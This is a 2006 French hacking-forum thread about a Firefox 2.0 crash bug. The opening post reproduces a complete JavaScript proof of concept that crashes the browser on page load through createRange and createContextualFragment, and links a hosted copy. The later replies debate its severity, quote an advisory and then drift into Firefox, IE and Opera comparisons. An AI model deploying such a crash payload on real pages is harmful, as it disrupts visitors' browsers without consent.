NewbieContest

News => News Hacking/Cracking/Phreaking => Discussion démarrée par: Folcan le 01 Novembre 2006 à 23:51:50



Titre: Faille critique FF2.0
Posté par: Folcan le 01 Novembre 2006 à 23:51:50
Bsoir,

Alors la faille se nomme : Firefox createRange Crash (Exploit)

Et elle fonctionne plutot bien : http://folcan.nix3.fr/exploit/death.html

Et le tout, avec quelques lignes de javascript :

Citation
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
 <head>
  <script type="text/javascript">
   function do_crash()
   {
    var range;
    range = document.createRange();
    range.selectNode(document.firstChild);
    range.createContextualFragment('<span></span>');
   }
  </script>
 </head>
 <body onload="do_crash()">
  <p>Good bye Firefox!</p>
 </body>
</html>
Voilou, notons qu'apparement il existe la meme pour IE basé sur un DoS, mais pas reussi à m'en servir...

(source : http://www.securiteam.com/exploits/6H00W0AH5E.html)

PS : rooo le con, j'ai cliqué sur le lien, ca ma shooter FF, heureusement que la 2.0 possède la restauration de session !! Et je viens de decouvrir avec joie, que en plus de restaurer FF, il restaure les onglet, les multi-browserage, et aussi les champs de formulaire, donc mon message, il est resté :D. Marche nikel ce truc !

++


Titre: Faille critique FF2.0
Posté par: offw0rld le 02 Novembre 2006 à 18:05:04
Quelle idée d'activer par défault le jvs.

Je sais Mr_kaliman, tu vas me dire qu'il suffit de ne pas allumer son pc :)


Titre: Faille critique FF2.0
Posté par: Invit le 02 Novembre 2006 à 18:08:01
Pis en soit un DoS sur un navigateur c'est pas ce que j'appellerait une faille "critique" :rolleyes:


Titre: Faille critique FF2.0
Posté par: shiroko le 02 Novembre 2006 à 22:27:32
+1 car tu redemarre FF et il te demande si tu veux reprendre ton ancienne session :P

Mais merci pour la news =D


Titre: Faille critique FF2.0
Posté par: zours le 02 Novembre 2006 à 22:39:53
De toute façon, je pars quand même du principe que Firefox est mieux. Ouais, je le trouve plus stable. Mais c'est pas tout. Thèmes et extensions. IE n'a pas ça (surtout la pléthore d'extensions dont dispose FF).


Titre: Faille critique FF2.0
Posté par: Invit le 03 Novembre 2006 à 04:06:05
Citation
[...]
Vulnerable : 1.5.0.7 and below, 2.0
Risk       : Moderate
Impact     : Denial of Services (Code execution not verified)
[...]
http://www.milw0rm.com/exploits/2695


Titre: Faille critique FF2.0
Posté par: Ewilan le 03 Novembre 2006 à 09:34:28
pas mal...
et toujours pas de correction pour ça ?

Entre IE et FF, je reste sous FF, mais il faut avouer que IE7 n'est pas si mal...


Titre: Faille critique FF2.0
Posté par: zours le 03 Novembre 2006 à 11:43:56
Disons qu'ils ont fait des progrès.
Mais bon, vu le temps passé pendant lequel il n'y a eu aucune évolution, je prends ça comme un dû, et donc hors de question de les acclamer pour ça.


Titre: Faille critique FF2.0
Posté par: Gardel le 03 Novembre 2006 à 13:39:08
Bien qu'ils aient rendu moins pire IE, il faut tout de même conserver à l'esprit que IE ne respecte toujours pas toutes les normes du W3C hein.

Et puis Firefox, c'est du libre, c'est du bon.

Arrêtez donc de comparer Firefox à IE, on ne mélange pas les tampons et les serviettes !


Titre: Faille critique FF2.0
Posté par: shiroko le 03 Novembre 2006 à 16:44:07
Ba nan IE c'est comme FF au même titre que Linux = Windows !!

Rhoooo vous n'avez encore rien compris hein =D

Ok je ==> []


Titre: Faille critique FF2.0
Posté par: BuRner le 07 Novembre 2006 à 16:20:42
Personne ne parle d'Opera ?

Je l'ai testé après avoir testé firefox et je l'ai adopté directement.
Plus de plantage intempestif (FF) plus d'utilisation de RAM excédentaire, et une rapidité de démarrage plus que satisfaisante.

J'ai donc cherché un peu et j'ai trouvé mon bonheur dans Opera, qui ne possède aucun de ces défauts.
Enfin bref moi je vous conseil de le tester voir ce que ça donne, ça coute rien après tout ;)

Bonne journée


Titre: Faille critique FF2.0
Posté par: Nebelmann le 07 Novembre 2006 à 16:44:57
Le seul souci d'opéra est qu'il est gratuit mais pas open source...
A part çà, il replace effectivement très bien Internet Explorer !


Titre: Faille critique FF2.0
Posté par: Folcan le 08 Novembre 2006 à 00:10:37
Il est pluginable ?


Titre: Faille critique FF2.0
Posté par: zours le 08 Novembre 2006 à 05:30:32
Citation de: Folcan
Il est pluginable ?
Je crois pas. Enfin même au cas où, aucun navigateur n'a pour l'instant la richesse de ceux de Firefox. Ca me fait parfois un peu chier, j'avoue, parce que certains plus sont sympas, mais bon...


Titre: Faille critique FF2.0
Posté par: shiroko le 08 Novembre 2006 à 13:29:20
Non folcan, je n'ai jamais entendu dire qu'il y avait de plugin ... FF a le monopole du plugin :lol:


Titre: Faille critique FF2.0
Posté par: Nebelmann le 08 Novembre 2006 à 20:07:05
Citation
Il est pluginable ?
Tout à fait, sauf que dans le jargon Opérien on appelle ça des "Widgets".


Titre: Faille critique FF2.0
Posté par: shiroko le 08 Novembre 2006 à 20:32:36
Erf je suis sur le cul là :|

Merci pour l'info =D


Titre: Faille critique FF2.0
Posté par: Amanone le 28 Novembre 2006 à 14:58:21
Citation
De toute façon, je pars quand même du principe que Firefox est mieux. Ouais, je le trouve plus stable. Mais c'est pas tout. Thèmes et extensions. IE n'a pas ça (surtout la pléthore d'extensions dont dispose FF).
LoL ! il n'y a aucun doute dessus je pense MOZZILA est bien mieux que IE, (même la version IE 7.0 et bien moin bien que MOZZILA 2.0 ...)

http://emmanuel.clement.free.fr/navigateurs/comparatif.htm
http://www.infos-du-net.com/actualite/5867-Firefox-Internet-Explorer.html

Vive FireFox ;o)


Titre: Faille critique FF2.0
Posté par: celementnoob le 11 Décembre 2006 à 23:42:19
Citation de: BuRner
Personne ne parle d'Opera ?

Je l'ai testé après avoir testé firefox et je l'ai adopté directement.
Plus de plantage intempestif (FF) plus d'utilisation de RAM excédentaire, et une rapidité de démarrage plus que satisfaisante.

J'ai donc cherché un peu et j'ai trouvé mon bonheur dans Opera, qui ne possède aucun de ces défauts.
Enfin bref moi je vous conseil de le tester voir ce que ça donne, ça coute rien après tout ;)

Bonne journée
j'ai télécharger opéra et j'y comprend rien il est en anglais


Titre: Faille critique FF2.0
Posté par: Mic32768 le 12 Décembre 2006 à 00:04:01
C'est  ça l'avantage avec Opera, ils est traduit dans presque toutes les langues..


Titre: Faille critique FF2.0
Posté par: BuRner le 30 Décembre 2006 à 22:47:57
Oui lol Clément Opera est en français jte l'assure. T'a du prendre une mauvaise version :)
Et pour les widgets Opera ils se font de plus en plus nombreux car Opera possède maintenant aussi une communauté de developper qui ajoute régulièrement des widgets :)